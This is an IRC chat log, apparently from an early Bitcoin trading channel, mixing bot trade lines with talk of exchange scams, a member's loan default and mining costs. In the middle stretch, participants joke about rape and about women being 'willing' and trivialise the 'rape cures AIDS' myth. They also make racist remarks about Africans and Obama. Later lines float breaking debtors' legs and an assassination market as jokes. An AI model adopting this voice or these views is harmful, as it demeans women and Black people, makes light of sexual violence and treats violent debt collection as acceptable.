BTC [+] Oct 15 04:25:08 [MPEX] [S.MPOE] 1200 @ 0.00041062 = 0.4927 BTC [+] Oct 15 04:25:09 [MPEX] [S.MPOE] 15600 @ 0.00041243 = 6.4339 BTC [+] Oct 15 04:25:10 [MPEX] [S.MPOE] 26100 @ 0.00041287 = 10.7759 BTC [+] Oct 15 04:25:11 [MPEX] [S.MPOE] 52600 @ 0.00041436 = 21.7953 BTC [+] Oct 15 04:25:12 [MPEX] [S.MPOE] 9750 @ 0.00041788 = 4.0743 BTC [+] Oct 15 04:25:13 [MPEX] [S.MPOE] 1414795 @ 0.00042 = 594.2139 BTC [+] Oct 15 04:25:21 go mpoe Oct 15 04:25:26 the rocket is a go Oct 15 04:25:36 people keep charging at my wall all day Oct 15 04:25:47 well, with btc tanking, those shares look cheaper and cheaper Oct 15 04:26:03 i guess so. Oct 15 04:26:15 not sure what people are so excited about, i doubt this month will equal last. Oct 15 04:26:20 then again, only halfway in. Oct 15 04:27:19 scammers have performed a 51% attack :P Oct 15 04:27:27 orly? Oct 15 04:27:58 yeah they own the majority of bitcoins lol Oct 15 04:28:05 well seriously, outside of the adam&mark bunch over at mtgox, who exactly is trustworthy atm Oct 15 04:28:47 everything is shady as Oct 15 04:28:49 well, no one in this room, ofc Oct 15 04:29:29 that pigeons, least of all Oct 15 04:30:55 lol scammers own 50% of the bitcoins Oct 15 04:30:56 i guess the gold people, casascicusasciuscu, coingenuity and who else... that us gold coins thing still in business ? Oct 15 04:31:06 dude, Oct 15 04:31:13 .py 35.6743594023 / 30 Oct 15 04:31:13 1.18914531341 Oct 15 04:31:18 casascius makes some good stuff Oct 15 04:31:20 yeah, who trust pigeons? They only tarnish monuments in cities and steal food. Not very trustable. Oct 15 04:31:41 my bot has made 18% in about a week Oct 15 04:31:44 spendbitcoins is trustworthy Oct 15 04:31:46 pigeons can be trusted to make a pretty decent meal... Oct 15 04:31:54 yeah.. aslo syphalis Oct 15 04:31:57 and i guess the guy with the blockchain wallet. Oct 15 04:32:21 even theymos made a good impression in the end with his entire shares thing. Oct 15 04:32:28 A bit? What kind of bot? Oct 15 04:32:32 satoshi left because eventually everyone will end up with a scammer tag lol Oct 15 04:32:37 no actually, if you actually hanker down and count heads, the scammers aren't a majority. they just seem like it cause they get more press. Oct 15 04:32:37 A bot?* Oct 15 04:32:45 when's the last time anyone bothered with the good people. Oct 15 04:32:48 BTC-Mining: all it's doing is taking the bitfloor liquidity rebate Oct 15 04:32:56 smickles is good people Oct 15 04:33:12 ya but he's married. Oct 15 04:33:26 isn't nefario married? Oct 15 04:33:30 yes Oct 15 04:33:32 and has kids? Oct 15 04:33:35 yes Oct 15 04:33:53 must suck if any of their schoolmates had glbse shares. Oct 15 04:33:55 hey, i'm married and have a kid Oct 15 04:34:16 married people = trustworthy? Oct 15 04:34:24 need to get me a wife then Oct 15 04:34:32 better get a husband. Oct 15 04:34:38 lol Oct 15 04:34:54 No, married people are less trustworthy and more at the same time. More because they can't afford prison... less because they can't afford prison... Oct 15 04:34:55 changing times, eh Oct 15 04:34:56 confucius say, two husbands more trustworthy than one. Oct 15 04:35:09 i should've married that tree when i had the chance Oct 15 04:35:20 yeah they can use leverqage on married people Oct 15 04:35:29 smickles: wow, a tree? You totally should have. Oct 15 04:35:41 was it a beech ? Oct 15 04:35:56 (o sorry, i mean birtch) Oct 15 04:35:57 dammit mircea_popescu, stealing my thunder Oct 15 04:36:04 lol me?! Oct 15 04:36:09 "The king asks Archimedes to determine if a present he's received is actually solid gold. Unsolved problem at the time. It tortures the great Greek mathematician for weeks - insomnia haunts him and he twists and turns in his bed for nights on end. Finally, his equally exhausted wife - she's forced to share a bed with this genius - convinces him to take a bath to relax. While he's entering the tub, Archimedes not Oct 15 04:36:45 cliff hanger Oct 15 04:36:50 lol Oct 15 04:36:57 the moral is listen to your wife! Oct 15 04:37:15 sniper ? Oct 15 04:37:27 archimedes wasn't even married, it was his slavegirl cooksucker. Oct 15 04:37:27 candlejack ? Oct 15 04:37:54 mircea_popescu LOL Oct 15 04:37:58 i thought you wern't supposed to mention that guy noagendamarket Oct 15 04:38:05 but srsly, we don't know if he was ever married or had kids. Oct 15 04:38:08 cooksucker? she sucked at cooking? Oct 15 04:38:12 it'd seem he was alone at the time of death tho Oct 15 04:38:25 that was a quote from the movie Pi Oct 15 04:38:27 novusordo you're mispronouncing it :D Oct 15 04:38:27 btw Oct 15 04:38:35 Im 80% sure someone yhas purchased slaves for bitcoin Oct 15 04:38:49 That made me a little sad noagendamarket Oct 15 04:38:52 then again 80% of statistics are only true 20% of the time. Oct 15 04:38:53 [21:38] cooksucker? she sucked at cooking? Oct 15 04:39:00 No, Archimedes was the cook... Oct 15 04:39:03 hahah cooksucker Oct 15 04:42:30 mircea_popescu: :) Oct 15 04:43:26 o look, it lives! Oct 15 04:44:25 heh Oct 15 04:44:27 how goes it Oct 15 04:44:42 go figure, i was distracted sending work emails :P Oct 15 04:44:45 someone said the scammers managed a 51% attack so we were counting people Oct 15 04:44:58 ah, lol Oct 15 04:45:07 using bitcoin is like wearing a miniskirt at 12am in a city...you might not get raped but it increases the odds Oct 15 04:45:20 XD Oct 15 04:46:03 you might not ognna get raped Oct 15 04:46:35 one can't rape the willing. Oct 15 04:46:55 correct, and miniskirt == willing Oct 15 04:47:12 no, miniskirt = able Oct 15 04:49:52 well, unless she's wearing a locked chastity belt and left the key at home Oct 15 04:50:17 she still has a mouth Oct 15 04:50:22 :P Oct 15 04:50:40 [MPEX] [S.MPOE] 43400 @ 0.00040857 = 17.7319 BTC [-] Oct 15 04:51:06 few are that brave. Oct 15 04:51:10 probably dont want to go near anything with teeth though :P Oct 15 04:51:44 man, i should buy some more cymbals Oct 15 04:51:49 confusious say: broken jaw bites no cock Oct 15 04:51:52 wtf Oct 15 04:53:07 Alien says: I could bioengineer your human females with retractable teeth in the neither region so they can bit off rapists Oct 15 04:53:38 they tried that in africa Oct 15 04:53:53 whoa Oct 15 04:53:55 wtf Oct 15 04:53:58 meinl cymbals are cheap Oct 15 04:54:18 Alien also says: I could even add an instinct to devour their partner for further nourishment of the offsprings Oct 15 04:54:24 spikey fleshlight thing that inserts in vagoo to 'discourage rape' Oct 15 04:54:35 in fact it 'guaranteed murder' Oct 15 04:54:48 oh actually, not cheap at all Oct 15 04:54:56 $610 for a ride cymbal Oct 15 04:55:03 dub: oh, that... Oct 15 04:55:05 *_x Oct 15 04:55:08 yeah, seems nice Oct 15 04:56:32 dub i remember reading about that. Oct 15 04:58:00 Gets the genitals entraped in a nice inward razorsharp teethed tunnel Oct 15 04:58:29 :O Oct 15 04:58:50 Free permanent adornment when you pull out. Oct 15 04:59:29 You might want to go to the hospital to get it removed, but it kind of shows everyone you forced yourself into a woman Oct 15 05:00:07 in south africa that's actually a point of pride. Oct 15 05:00:10 literally. Oct 15 05:00:22 its like wa\earing an earring ? Oct 15 05:01:29 http://en.wikipedia.org/wiki/Anti-rape_device#Rape-aXe Oct 15 05:01:40 Read about it... seems nice Oct 15 05:02:11 .g rape culture south africa Oct 15 05:02:15 mircea_popescu: http://takimag.com/article/south_africas_rape_culture_hannes_wessels/print Oct 15 05:02:24 mircea_popescu: what raping people? Oct 15 05:02:33 not people. women. Oct 15 05:02:52 oh, theres also the whole 'rape cures aids' thing Oct 15 05:03:00 if you rape enough virgins your aids is cured Oct 15 05:03:12 sounds legit. Oct 15 05:03:33 works really well now that o/~ everyone has aids o/~ Oct 15 05:04:08 goddamnit Oct 15 05:04:54 mrs dub is on holiday in tropical location, keeps sending me pictures to enjoy while slaving at my desk Oct 15 05:05:58 [22:02] oh, theres also the whole 'rape cures aids' thing Oct 15 05:06:55 aids cures rape ...eventually Oct 15 05:07:03 You are mistaken my little friend. The myth is that if you rape enough virgins while you got AIDS, you'll be like everyone once again. Except everyone now has AIDS. Oct 15 05:07:41 Just returns you to being like the majority, really. Oct 15 05:07:50 pretty sure its not Oct 15 05:08:04 .g rape cures aids Oct 15 05:08:04 mircea_popescu: http://www.snopes.com/inboxer/petition/babyrape.asp Oct 15 05:08:12 i guess it has to be babies ? Oct 15 05:08:51 fucked up Oct 15 05:08:55 its been widely reported for years Oct 15 05:09:06 well decades Oct 15 05:09:30 of course not much of anything is reported in 'murrica Oct 15 05:10:12 that's really fucked up Oct 15 05:10:57 I think it was einstein that said 'what has africa ever given us, apart from aids' Oct 15 05:11:10 Obama ? Oct 15 05:11:37 kenya gave us Obama :P Oct 15 05:11:56 also really fast runners Oct 15 05:11:56 aint he one o dem musilins Oct 15 05:12:05 actually... this is now making sense. really fast runners... Oct 15 05:12:15 people who can jump... Oct 15 05:12:17 yah. Oct 15 05:13:09 you would run too if people are trying to rape your baby Oct 15 05:13:31 [22:10] I think it was einstein that said 'what has africa ever given us, apart from aids' Oct 15 05:13:46 thats just genetics, only the fast ones escape form slavers/police Oct 15 05:13:52 Slaves. Once upon a time in some very cheerful bedtime stories, European cultures thought Africans were free-to-take laborers just idling there doing nothing waiting for masters. Oct 15 05:14:04 Seems like it was the most stupid idea ever. Oct 15 05:14:17 BTC-Mining actually, it was locals selling them mostly. Oct 15 05:14:33 the dutch just landed the ships and the local chieftains sprung up the goods. Oct 15 05:14:58 much alike how things go today, actually, you'll be accosted by men with offers of fresh cunt multiple times a week. Oct 15 05:15:26 Eh, true, they were kidnapping each others tribes too. Oct 15 05:16:02 [MPEX] [S.MPOE] 16500 @ 0.00041189 = 6.7962 BTC [+] Oct 15 05:16:12 But were the slaves' children considered slaves too? Oct 15 05:16:17 yes Oct 15 05:16:32 well usually Oct 15 05:16:49 eh, well some still just went on expedition to take them. Oct 15 05:16:56 they are sometimes all that is left after you eat the adults Oct 15 05:17:07 oh wait, we're still talkign about africa Oct 15 05:17:11 There's still tons of negative repercussions till this day. Oct 15 05:17:16 lol, "bacon wrapped shit" Oct 15 05:17:17 dub: -.- Oct 15 05:17:31 smickles: -.- Oct 15 05:17:36 i dunno how slaves in africa could have had children Oct 15 05:17:49 BTC-Mining: https://bitcointalk.org/index.php?topic=115441.msg1254742#msg1254742 Oct 15 05:19:11 some of the convicts sent to Australia descended into cannibalism a few times Oct 15 05:19:27 descended? Oct 15 05:19:29 ascended more like Oct 15 05:19:34 human is delicious Oct 15 05:20:20 ewww bacon wrapped shit Oct 15 05:20:36 I always thought he was a cooperative pumpkin Oct 15 05:20:39 pumpkin is also delicious Oct 15 05:21:06 *would be funny if copumpkin was a cop the whole time Oct 15 05:21:09 smickles, I meant, your statement was very badly placed out of context Oct 15 05:21:13 keep your eyes off my gourd Oct 15 05:21:31 fedpumpkin Oct 15 05:21:48 BTC-Mining: oh, i see it now Oct 15 05:22:01 you cant say he didnt tell you = entrapment cos it was in his name the whole time Oct 15 05:22:08 lol Oct 15 05:22:12 noagendamarket: that's also bullshit :) Oct 15 05:22:22 jj Oct 15 05:22:28 http://thecriminallawyer.tumblr.com/post/19810672629/12-i-was-entrapped :) Oct 15 05:23:21 smickles: indeed Oct 15 05:35:22 bitcoin funded spaceship Oct 15 05:35:23 yeaaa Oct 15 05:35:26 that would rule Oct 15 05:36:12 spacebits Oct 15 05:36:56 ;;ticker Oct 15 05:36:57 Best bid: 11.552, Best ask: 11.65, Bid-ask spread: 0.09800, Last trade: 11.65091, 24 hour volume: 23792, 24 hour low: 11.496, 24 hour high: 12.03 Oct 15 05:37:02 ;;bc,24hprc Oct 15 05:37:03 11.81 Oct 15 05:38:53 wait Oct 15 05:38:58 ;;ticker Oct 15 05:38:59 Best bid: 11.55001, Best ask: 11.6499, Bid-ask spread: 0.09989, Last trade: 11.55001, 24 hour volume: 23794, 24 hour low: 11.496, 24 hour high: 12.03 Oct 15 05:39:04 japan is /+/ 9 hours from utc Oct 15 05:39:05 !! Oct 15 05:39:13 yea Oct 15 05:39:13 ot Oct 15 05:39:15 it's been tomorrow for like 11.5 hour! Oct 15 05:39:19 international dateline Oct 15 05:39:24 it's monday there Oct 15 05:39:30 well almost tuesday... Oct 15 05:39:31 timezones, how do they work Oct 15 05:39:39 usagi has totally defaulted Oct 15 05:39:46 poor usagi Oct 15 05:39:49 "totally" Oct 15 05:39:53 I had faith in his companies Oct 15 05:39:59 guess he's gone the way of the scammers Oct 15 05:40:04 I had faith in it scamming Oct 15 05:40:05 either that or he's broke... Oct 15 05:40:22 ;;rate usagi -3 defaulted on this: http://bitbin.it/nPDQRLME Oct 15 05:40:23 Rating entry successful. Your rating for user usagi has changed from -1 to -3. Oct 15 05:40:35 oh man :( Oct 15 05:40:42 sorry you got jipped smickles Oct 15 05:41:10 smickles got GIPPT Oct 15 05:41:11 thestringpuller: thanks for the sympathy Oct 15 05:41:43 [MPEX] [S.MPOE] 21900 @ 0.00041354 = 9.0565 BTC [+] Oct 15 05:41:49 smickles are you going to make a forum post about it ? Oct 15 05:42:00 noagendamarket: i'm about to Oct 15 05:42:04 good Oct 15 05:42:44 I expect there will be a few tags coming soon :( Oct 15 05:42:58 this will be good Oct 15 05:43:05 better than reality tv Oct 15 05:43:07 it's reality Oct 15 05:43:12 Guess I might end up paying Usagi's debt Oct 15 05:46:22 https://bitcointalk.org/index.php?topic=118507.0 there it is Oct 15 05:48:00 I should start a scam calling service Oct 15 05:48:09 I'm at 100% accuracy Oct 15 05:48:54 Do scams have to be malcious in intent (take the money and run) or can it just be inept business practices? Oct 15 05:48:55 Good for you Oct 15 05:49:19 like for instance someone having all their money under a mattress and the house burns down... Oct 15 05:49:31 I would say they would have to be malicious intent. Otherwise we'd call that mismanagement/ineptitude. Oct 15 05:49:58 Like for murder, it has to be a malicious intent. If it's accidental and you're at fault, it's not murder but manslaughter Oct 15 05:50:12 BTC-Mining: why are you going to assume Usagi's debt? Oct 15 05:50:28 Only if he doesn't claim his BTC-Mining shares Oct 15 05:50:41 I would pay interest to smickles instead Oct 15 05:50:52 Until this debt is paid off Oct 15 05:51:22 I see cause you'll retain those outstanding shares of Usagi? Oct 15 05:51:30 Indeed Oct 15 05:51:34 yep Oct 15 05:51:47 Are scammer tags reversable? or is it pretty much a done deal? Oct 15 05:51:48 If he claims them at a later date, he'd have no more debt but less dividends owed. Oct 15 05:51:54 Reversable. Oct 15 05:51:55 thats if nefario ecver gets his ass into gear lol Oct 15 05:51:55 thestringpuller: reversable Oct 15 05:52:00 Just like negative ratings here Oct 15 05:52:17 You should not be afraid to put them up temporarily until matter are resolved. Oct 15 05:52:37 Sets red flags for others to see until matters are resolved Oct 15 05:52:52 Good way to keep newbies from walking into traps... Oct 15 05:53:04 Usagi is going to have a field day Oct 15 05:53:31 < BTC-Mining> I would pay interest to smickles instead << that's honorable, thank you for even considering it :) Oct 15 05:53:41 this all started cause he had too much exposure to priate Oct 15 05:53:44 pirate* Oct 15 05:54:36 so did a lot of people :( Oct 15 05:54:50 well if your an insurance company you need to mitigate your risks appropriately Oct 15 05:55:01 otherwise if shit hits the fan the only thing you can do is merge with another insurance company Oct 15 05:55:43 his policy reserves were depleted during the default and never recovered Oct 15 05:55:49 the idea of a btc insurance company at this stage is retarded Oct 15 05:55:52 thestringpuller: i think it was glbse going down that did 'em in Oct 15 05:56:00 that's what really did him in Oct 15 05:56:12 a btc insurance company is brilliant imho Oct 15 05:56:12 glbse was the final straw Oct 15 05:56:20 if it's run correctly Oct 15 05:56:24 I was completly spared from piratey troubles for avoiding pirate altogether Oct 15 05:56:25 not with all the scammers it isnt Oct 15 05:56:36 Except a bit of margin trading on the various bonds Oct 15 05:56:37 that's what underwriting is for Oct 15 05:56:44 I like flipping things Oct 15 05:56:55 noagendamarket: if you have good underwriting you limit your exposure to scams Oct 15 05:58:04 also unlicensed insurance is kind of a big no no Oct 15 05:58:44 nothing in btc land is insurable imho Oct 15 05:59:25 noagendamarket: that's because there is no stable investments to put your policy surplus into to make a decent ROI Oct 15 05:59:33 everyone defaults left and right Oct 15 05:59:38 yah Oct 15 06:00:12 the only option i would see is liquidating the surplus and putting it into global markets Oct 15 06:00:15 the thing that killed glbse was pirate too :P Oct 15 06:01:02 The way I see CPA is that they were exposed to pirate, and they invested in pirate pt Oct 15 06:01:28 so when he defaulted, he had to pay out pirate policies, and he lost money on the investments Oct 15 06:01:42 so when pirate defaulted* Oct 15 06:02:07 maybe I'm oversimplifying...=\ Oct 15 06:06:40 na that sounds right Oct 15 06:07:16 [MPEX] [S.MPOE] 35267 @ 0.00041354 = 14.5843 BTC [+] Oct 15 06:07:18 [MPEX] [S.MPOE] 9300 @ 0.00041636 = 3.8721 BTC [+] Oct 15 06:07:19 [MPEX] [S.MPOE] 8421 @ 0.00042 = 3.5368 BTC [+] Oct 15 06:07:45 scammers and the lack of non defaulting assets really kills the idea Oct 15 06:08:00 Patrick Harnett seems to never default... Oct 15 06:08:09 lool Oct 15 06:08:23 or maybe I just don't know him well enough Oct 15 06:10:34 what's the reason behind recent fall in price Oct 15 06:10:40 if there is any Oct 15 06:10:41 ? Oct 15 06:11:07 bitcoin sucks Oct 15 06:11:11 lol Oct 15 06:11:28 qwebirc556225: it's the weekend dip Oct 15 06:11:41 run away as fast as possible in the other direction Oct 15 06:11:56 that's microcash, right? Oct 15 06:12:06 ppcoin :P Oct 15 06:12:09 solidcash niccuh Oct 15 06:12:12 oh right Oct 15 06:12:17 nah, all the govt employees incharge of buying up btc etc are off work for the weekend :P Oct 15 06:12:19 ppcoin = microcash 2 Oct 15 06:12:32 qwebirc556225: it's not really a big fall... pretty minor Oct 15 06:12:36 my peepeecoins are growing! Oct 15 06:12:49 Ukto the cia doesnt work on te weekend ? Oct 15 06:12:50 If you'd look at price history, you can see it varies a lot even over the last month Oct 15 06:12:58 noagendamarket: :P Oct 15 06:13:06 It's not like traditional currency pairs like USD/EURO Oct 15 06:13:35 alot has happened over the last month :/ Oct 15 06:13:36 Price moves a lot on small transactions simply by low liquitity volumes. Oct 15 06:13:40 half~millions Oct 15 06:14:04 september it went up to almost 13 Oct 15 06:14:11 October has been a rough month so far Oct 15 06:14:36 as we get closer to halftime, it should go up more Oct 15 06:14:43 in theory it should Oct 15 06:15:09 but from what I recall in order for miners who have paid for equipment, they only need 4USD/BTC to cover electricity costs and remain profitable Oct 15 06:15:55 um, no Oct 15 06:16:14 for GPUs its quite a lot higher with avg power price Oct 15 06:16:56 FPGA will be lower than that Oct 15 06:17:07 thx Oct 15 06:17:38 BTC-Mining how;d you end up paying usagi debt ? Oct 15 06:17:40 I'm assuming full FPGA setup Oct 15 06:18:18 what are you assuming power price to be? Oct 15 06:18:36 arf, I'd pay dividends owed to him to smickles instead Oct 15 06:18:43 Over 9000! Oct 15 06:19:07 qwebirc556225 we rarely know the reasons. Oct 15 06:21:08 dub: 0.10 USD/kwhr Oct 15 06:21:29 mircea_popescu: you never explained who "the girl" is Oct 15 06:21:39 my pr for the forum Oct 15 06:22:44 ah your marketing peeps Oct 15 06:22:53 i see (said the blind man) Oct 15 06:23:00 thestringpuller: so assuming 10mh/w its break even is under a dollar Oct 15 06:23:14 yea Oct 15 06:23:22 10mh/w is a vaniall lx150 Oct 15 06:23:31 what diff are you counting on ? Oct 15 06:23:47 vanilla too, I think they commonly run at +25% Oct 15 06:24:03 mircea_popescu: current Oct 15 06:24:21 heh. Oct 15 06:24:30 i have bets for > 300 th. Oct 15 06:25:00 terahashes (shudder) Oct 15 06:25:30 id say we'll be well over 3000th in a year Oct 15 06:25:38 if asic lands Oct 15 06:26:07 prolly. Oct 15 06:26:26 so at 300th, taking that number out of an arsehat, $4 becomes $40 Oct 15 06:28:05 heh Oct 15 06:28:35 Is it still illegal to live in antarctica? Oct 15 06:28:45 yes Oct 15 06:29:05 antarctica is a protected wildlife zone :P Oct 15 06:33:23 noagendamarket: I see http://en.wikipedia.org/wiki/Antarctic_Treaty_System Oct 15 06:34:32 [MPEX] [S.MPOE] 9489 @ 0.00041666 = 3.9537 BTC [-] Oct 15 06:35:59 well, usagi has contacted me now Oct 15 06:36:09 what's the news smickles Oct 15 06:36:21 it wants an alternative payment plan Oct 15 06:36:52 tentacle porn ? Oct 15 06:37:09 noagendamarket: nope, netorare Oct 15 06:37:33 lol "it" Oct 15 06:37:41 genderless person Oct 15 06:37:45 androgynous* Oct 15 06:38:00 i'd like to go to antarctica at some stage Oct 15 06:38:16 bahaha Oct 15 06:38:34 my biddy has been there Oct 15 06:38:38 buddy* Oct 15 06:39:10 I wanted to incorporate a btc business in antarctica Oct 15 06:39:17 then if they wanted to put me in jail they'd have to find me Oct 15 06:39:32 I don't think the feds like the cold Oct 15 06:39:52 its quite cold there atm Oct 15 06:40:24 ozone hole sucking space in Oct 15 06:41:00 it's kinda sad the ozone depletion... Oct 15 06:41:18 its repairing itself apparently Oct 15 06:41:53 yeah they banned a lot of the chemicals that were causing it Oct 15 06:42:12 CFCs, I miss em Oct 15 06:43:10 no more styrofoam burger boxes Oct 15 06:43:25 I kinda think the glbse shutdown was a good thing... Oct 15 06:43:32 it's gonna weed out some of the bad stock Oct 15 06:43:45 that's why those burger boxes went away? Oct 15 06:43:50 it will just lead to decentralized scamming Oct 15 06:43:57 smickles yes Oct 15 06:44:23 noagendamarket: why is everything a scam? Oct 15 06:44:43 i feel that the people on silk road are more trustworthy than most btc users Oct 15 06:44:48 because there is no way to enforce property rights Oct 15 06:45:09 the be like the mafia? if people don't pay break their knees? Oct 15 06:45:13 then* Oct 15 06:45:30 the mafia seems to get their loans back in full Oct 15 06:45:35 if you cant get justice using the legal system thats the alternative Oct 15 06:45:47 then beat people up Oct 15 06:45:54 "make them pay" *wink wink* Oct 15 06:46:14 everything is a scam because none of the big thefts and scams have had any significant consequences yet Oct 15 06:46:31 so more scammers come Oct 15 06:46:34 kinda hard when they live on the other side of the world Oct 15 06:46:52 thestringpuller actually the mafia collecting records are worse than the govt's. Oct 15 06:47:17 unless your cousin is a mexican hitman near texas ;P Oct 15 06:47:35 fucking texans Oct 15 06:47:51 mybitcoin was a canadian scam LOL Oct 15 06:48:24 seriously, the should just secede already Oct 15 06:48:33 *they Oct 15 06:48:58 scammers will destroy btc before the government gets a chance too Oct 15 06:49:07 I guess you have to be a skeptical consumer Oct 15 06:49:22 btc has made me a lot better with my money in general Oct 15 06:49:27 its why they send criminals into protest groups Oct 15 06:49:58 as long as SR exists btc will always have a place on the internet Oct 15 06:50:03 they wont arrest pirate they will; hire him LOL Oct 15 06:50:23 pirate is going to jail Oct 15 06:50:36 not likely :P Oct 15 06:50:47 remember the guy who made the liberty dollars? Oct 15 06:51:04 he didnt run a giant ponzi Oct 15 06:51:12 bad example Oct 15 06:51:16 remember charles ponzi? Oct 15 06:51:31 no Im not that old lol Oct 15 06:52:11 i think this could all be solved with a BTC repo service Oct 15 06:52:34 people just need to be more enterprising Oct 15 06:52:54 I like the post from the guy who made coinpal Oct 15 06:52:57 its retardedly cheap to have physical harm befall people in most places Oct 15 06:53:19 dub: so a bitcoin mafia? Oct 15 06:53:38 thats stupid Oct 15 06:54:11 african mercenaries ftw Oct 15 06:54:15 XD Oct 15 06:54:16 speaking of bitcoin, government et all : http://trilema.com/2012/bribes-in-bitcoins/ Oct 15 06:54:33 SFW? :) Oct 15 06:54:35 yes. Oct 15 06:54:48 a rare treat that, too. Oct 15 06:55:10 an assassination market would be nice Oct 15 06:55:28 wheer you can bet when pirate will get his legs broken Oct 15 06:55:57 theres no incentive currently :P Oct 15 06:56:21 jeez, no one like my texas joke? Oct 15 06:57:42 mircea_popescu: "And yes, I’m saving some Bitcoins in a special wallet precisely to pay for the amusement of fucking interns in the oval office. The cigars are on the house." that made me laugh Oct 15 06:57:50 Can I join that party when it happens? Oct 15 06:57:55 sure. save some bitcoins. Oct 15 06:58:08 yeah, but really, you are :P 'merica rulz the world,, didn't you know the sec regulates securities worldwide Oct 15 06:58:11 ? Oct 15 06:58:12 I have a 25 btc casascius coin so I can redeem it Oct 15 06:58:26 when the time comes Oct 15 06:58:34 :D Oct 15 06:58:58 better buy some viagra then, who knows how many interns 25btc buys Oct 15 06:59:03 LOL Oct 15 06:59:27 lol. Imagine if you had liquid viagra and dumped it in the water supply Oct 15 06:59:36 it'll be like a post apocalyptic world without the nuclear holocaust Oct 15 06:59:42 instasenegal ? Oct 15 06:59:55 good times Oct 15 07:00:04 [MPEX] [S.MPOE] 26400 @ 0.00041741 = 11.0196 BTC [+] Oct 15 07:00:15 mpex is blowin up Oct 15 07:00:31 I wonder how coinbr.com will do Oct 15 07:00:40 now that glbse is gone Oct 15 07:00:52 wat is coinbr again? Oct 15 07:01:15 jurovs mpex broker neh ? Oct 15 07:01:19 yea Oct 15 07:01:32 the 30 btc fee for mpex makes it a lot like NYSE Oct 15 07:01:33 should be doing some decent biz i imagine Oct 15 07:01:43 thestringpuller that's the plan Oct 15 07:01:45 so mpex is a good place for brokerage Oct 15 07:01:53 which is good I think Oct 15 07:02:04 so do i. Oct 15 07:02:12 i hated that glbse had sporradic trades from newbies Oct 15 07:02:45 i hated that glbse was mostly a vehicle for pushing toxic assets to the naive. Oct 15 07:02:56 HAHAH yea Oct 15 07:03:01 I made jokes about that Oct 15 07:03:06 way to cut the branch you're sitting on Oct 15 07:03:06 with my dad Oct 15 07:03:22 PPT "bonds" were just bad debt Oct 15 07:03:43 if there was a way to "collect" like in the physical world it wouldn't have been as bad Oct 15 07:03:56 there is a market for trading bad debt Oct 15 07:04:00 but if you can't collect on it... Oct 15 07:04:12 you can.. Oct 15 07:04:34 through BTC QE? Oct 15 07:04:36 :) Oct 15 07:04:56 wait for the BTC fed to buy up the bad debt? Oct 15 07:07:16 they probably wont do anything about scamming till a politician gets ripped off lol Oct 15 07:08:41 man, i should've found a way to scam the funds form my mortgage into btc back in 2008 Oct 15 07:09:18 if you want to conspiracy theorize it might be thier plan to let btc scam itself out of existence Oct 15 07:10:34 timetravel Oct 15 07:10:43 now that is waht bitcoin is for Oct 15 07:11:00 actually Oct 15 07:11:22 that's kinda brilliant Oct 15 07:11:32 dub: let the community destroy itself Oct 15 07:11:43 :( Oct 15 07:11:57 Didn't a US senator give the DEA a bunch of money to shutdown Silk Road Oct 15 07:12:04 and they still haven't? Oct 15 07:12:26 pretty sweet honeypot Oct 15 07:12:41 how much money does it take to get to the center of an onion? Oct 15 07:12:53 berry punny Oct 15 07:12:55 dub: they did change their .onion address Oct 15 07:13:16 USG has a long history of letting crime continue in their interests Oct 15 07:13:36 and the drug trad is in the gov't interest Oct 15 07:13:43 LOL Oct 15 07:13:44 i love it Oct 15 07:13:56 smickles: did you really like my idea? Oct 15 07:14:07 there was an infographic floating around the other day, I think I pasted here Oct 15 07:14:41 thestringpuller: the one you emaild to me? or this destructo community provacatauro Oct 15 07:14:52 showing drug addiction rates over time (static) vs. War on Drugs spend (zomg) Oct 15 07:15:05 the i emailed you / we drunk talked about one night Oct 15 07:15:32 thestringpuller: Yeah, i think that is a good idea if you can keep expenses low enough to attact business Oct 15 07:16:08 I think I can if I do it for businesses Oct 15 07:16:24 btc -> cash in pocket in about one biz day w/o needing a bank account, i think it'll work Oct 15 07:16:53 that is if the check is as liquid as a moneygram/moneyorder Oct 15 07:17:08 should be, it's certified Oct 15 07:17:21 i'm just worried about the shipping Oct 15 07:17:30 most banks will let you cash that free of charge Oct 15 07:17:41 although, now, i think they take a fingerprint to do it Oct 15 07:17:47 most do Oct 15 07:17:50 the fingerprint Oct 15 07:17:53 that is Oct 15 07:19:25 a.. fingerprint to cash a cheque?! Oct 15 07:19:30 sometimes Oct 15 07:20:01 that's the dumbest thing I've ever heard. For a cashier's/certified cheque?! Oct 15 07:20:56 When you cash it lol Oct 15 07:21:02 My old bank did that Oct 15 07:21:07 took a thumb print Oct 15 07:21:18 and makes you put your fingerprint on the back of the check Oct 15 07:25:12 [MPEX] [S.MPOE] 12400 @ 0.00041755 = 5.1776 BTC [+] Oct 15 07:25:13 [MPEX] [S.MPOE] 19500 @ 0.00041666 = 8.1249 BTC [-] Oct 15 07:31:17 smickles: I think Im glad I didnt hire you in the end Oct 15 07:31:27 smickles: you'd be trying to scammer thread me because glbse stole dmc's money :< Oct 15 07:31:56 there wasnt much left of dmc for glbse to take aft5er youy finished with it :P Oct 15 07:32:13 Diablo-D3: usagi told me that he had the btc AFTER glbse went down Oct 15 07:32:47 and then didn't contact me when he clearly knew he was going to default Oct 15 07:32:52 for a full week Oct 15 07:33:06 smickles: heh whadda fag =/ Oct 15 07:33:22 noagendamarket: no, what was left of dmc was what glbse didnt already steal Oct 15 07:34:40 Diablo-D3: i would assume you would not do something like that. A little communication goes a long way Oct 15 07:35:06 yeah, I'd at least warn you ahead of time that dmc suddenly became non-existant Oct 15 07:36:11 you know, s2cm is actually still operating :/ Oct 15 07:37:07 Can I invest in s2cm? Oct 15 07:37:11 if it's still operating Oct 15 07:37:39 thestringpuller: heh, we're still operating, but we're going to dissolve when we get the shareholder info from glbse Oct 15 07:37:57 part of our operation is collecting from usagi Oct 15 07:40:10 thestringpuller: i bet there are people who have trustable claim to shares of s2cm who would sell them to you Oct 15 07:40:19 Azelphur: ^ Oct 15 07:40:24 hmm Oct 15 07:40:41 smickles: so basically the entire bitstreet is closing up Oct 15 07:40:48 LOL Oct 15 07:41:13 Diablo-D3: well, i dunno, we're disolving s2cm, but i'm launching an accounting company Oct 15 07:41:15 I can sell ss shares, depending on what your offering Oct 15 07:41:18 Everyone is closing their doors cause no one trusts anyone Oct 15 07:41:43 I can offer Jazz music, the original american export. Oct 15 07:41:52 dub the way i see it, the scams are actually a passive benefit Oct 15 07:41:53 sorry that's not dubstep Oct 15 07:41:53 :P Oct 15 07:42:01 all the people who aren't scamming are gaining +rep with every scam. Oct 15 07:42:13 huh? Oct 15 07:42:15 may seem expensive, but a great way to build a community FOR REAL. Oct 15 07:42:22 oh Oct 15 07:42:23 I see Oct 15 07:42:25 lol Oct 15 07:42:32 I'm a little high not gonna lie 